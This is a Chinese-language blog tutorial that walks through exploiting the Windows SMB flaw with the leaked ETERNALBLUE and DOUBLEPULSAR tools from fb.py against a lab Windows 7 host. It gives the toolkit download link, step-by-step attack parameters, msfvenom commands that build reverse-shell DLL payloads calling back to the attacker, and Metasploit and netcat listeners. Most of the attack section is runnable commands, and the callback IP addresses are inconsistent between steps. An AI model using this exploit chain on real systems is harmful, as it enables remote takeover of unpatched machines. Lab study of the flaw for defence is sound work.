@websec007 2017-04-19T15:10:26.000000Z 字数 2528 阅读 4309

方程式工具箱之SMB漏洞利用

副标题：fb.py脚本之ETERNALBLUE & Doublepulsar 插件使用

工具收集

SMB 漏洞利用过程小结

1、验证SMB 445端口是否开放
2、验证SMB 漏洞
3、shell反弹成功

一、测试环境准备

1. 攻击机两台(win2003 & kali)

（1）攻击主机1：windows 2003

IP地址:192.168.31.100
（2）攻击主机2：kali

IP地址:192.168.31.200

2. 被攻击主机一台(win7)

（1）靶机环境：windows 7 x64bit

IP地址：192.168.31.41
环境要求：存在smb漏洞

3. fb.py环境配置

在window 2003 攻击主机中配置fb.py运行环境，具体的要求有以下两大项配置内容。
- python运行环境
- fb.py环境包部署

3.1. python运行环境

python安装包：python-2.6.6.msi

https://www.python.org/ftp/python/2.6.6/python-2.6.6.msi
注意：安装完python2.6.6后，请将c:\python2.6的路径添加到环境变量中。
pywin32第三方库：pywin32-221.win32-py2.6.exe

https://nchc.dl.sourceforge.net/project/pywin32/pywin32/Build%20221/pywin32-221.win32-py2.6.exe

3.2 fb.py环境包部署

（1）方程式ETERNALBLUE 工具包下载

https://codeload.github.com/misterch0c/shadowbroker/zip/master
（2）fb.py 环境部署
- ETERNALBLUE解压
  
  将解压后的整个ETERNALBLUE 目录下的 windows复制到攻击机win2003上“c:\python26”目录下，
- 新建listeningposts项目目录
  
  在“c:\python26windows\”目录下新建一个文件名为：listeningposts的项目目录。
（3）fb.py 环境测试
- 打开cmd命令行
  打开cmd命令行，进入目录“c:\python26windows\”下。
```
> cd c:\python26\windows
```
- 运行fb.py脚本
```
> python fb.py
能够成功运行即可。
```

二、攻击演示

攻击步骤简介：
- 运行fb.py,配置eternalblue攻击条件；
- 使用msfvenom生成“反弹shell的攻击的攻击载荷win.dll”（payload）；
- 使用msfconsole来打开一个本地的监听端口（或者nc -lvvp 也可以）；
- 使用dou 将攻击载荷win.dll上传到被攻击主机，并主动反弹一个shell到本地；

2.1 配置eternalblue攻击条件

(1) 运行fb.py脚本

> cd c:\python\windows\ 
> python fb.py

Markdown

(2) 设定攻击目标参数

Set TargetIP: 192.168.31.41
Set callbackIP: 192.168.31.100
Use Redirection: no
Base Log dircetory: c:\logs

Markdown

(3) 调用Eternalblue攻击插件

Markdown

(4) 执行攻击插件

Markdown

(5) 调用doublepulsar查询

Markdown

(6) 设定插件doublepulsar攻击参数

指定攻击载荷位置: c:\shell.dll
选择攻击目标主机架构：x64

DLLPaload : c:\shell.dll 
Architecture: x64

Markdown

2.2 使用msfvenom生成反弹攻击载荷（payload）

(1) msfvenom生产shell反弹攻击载荷

> msfvenom -p windows/x64/reverse_tcp LHOST=192.168.31.100 LPORT=12345 -f dll >win.dll

(2) 复制win.dll到攻击机10.48.31.100

将win.dll恶意程序复制到攻击主机 10.48.31.100 C:\根目录下。

2.3 使用msf框架接收shell反弹

在msf下开启msfpaylod监听,接收shell反弹：

use exploit/multi/handler
set lhost 192.168.1.106
set lport 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

三、使用nc接收 reverse_shell_tcp 的反弹shell

3.1 生成自带shell的反弹恶意程序shell.dll

使用kali自带的msf框架，查找到shell_reverse_tcp的payload路径，然后使用msfvenom生成一个自带shell的恶意反弹程序。

(1) 查找shell_reverse_tcp payload路径

\> msfconsole
\> search shell_reverse_tcp

获取到 x64位的payload路径：payload/windows/x64/shell_reverse_tcp

Markdown

(2) 使用msfvenom 生成自带shell的反弹恶意程序 shell.dll

msfvencom -p payload/windows/x64/shell_reverse_tcp LHOST=192.168.31.100 LPORT=12345 -f dll >shell.dll

Markdown

3.2 使用nc打开一个本地监听

(1)使用 nc -lvvp 12345打开本地监听

\> nc -lvvp 12345

Markdown

(2) 调用攻击插件eternalblue

将msfvenom生成的攻击载荷 shell.dll 复制到攻击主机192.168.31.100的C:\根目录
运行fb.py脚本
调用 eternalblue 插件，配置好相关参数,具体配置参加2.1章节
继续调用 doublepulsar 插件，指定好shell.dll位置和攻击目标架构（x64）,具体配置参加2.1章节

(3) 成功接收到shell.dll的反弹shell

Markdown

参考文档：

1. 方程式ETERNALBLUE 之fb.py的复现
2. Windows漏洞实战，盲打女寝
3.i春秋视频演示与实验环境

方程式工具箱之SMB漏洞利用

副标题：fb.py脚本之ETERNALBLUE & Doublepulsar 插件使用

SMB 漏洞利用过程小结

一、测试环境准备

1. 攻击机两台(win2003 & kali)

2. 被攻击主机一台(win7)

3. fb.py环境配置

3.1. python运行环境

3.2 fb.py环境包部署

二、攻击演示

2.1 配置eternalblue攻击条件

(1) 运行fb.py脚本

(2) 设定攻击目标参数

(3) 调用Eternalblue攻击插件

(4) 执行攻击插件

(5) 调用doublepulsar查询

(6) 设定插件doublepulsar攻击参数

2.2 使用msfvenom生成反弹攻击载荷（payload）

(1) msfvenom生产shell反弹攻击载荷

(2) 复制win.dll到攻击机10.48.31.100

2.3 使用msf框架接收shell反弹

三、使用nc接收 reverse_shell_tcp 的反弹shell

3.1 生成自带shell的反弹恶意程序shell.dll

(1) 查找shell_reverse_tcp payload路径

(2) 使用msfvenom 生成自带shell的反弹恶意程序 shell.dll

3.2 使用nc打开一个本地监听

(1)使用 nc -lvvp 12345打开本地监听

(2) 调用攻击插件eternalblue

(3) 成功接收到shell.dll的反弹shell

参考文档：

内容目录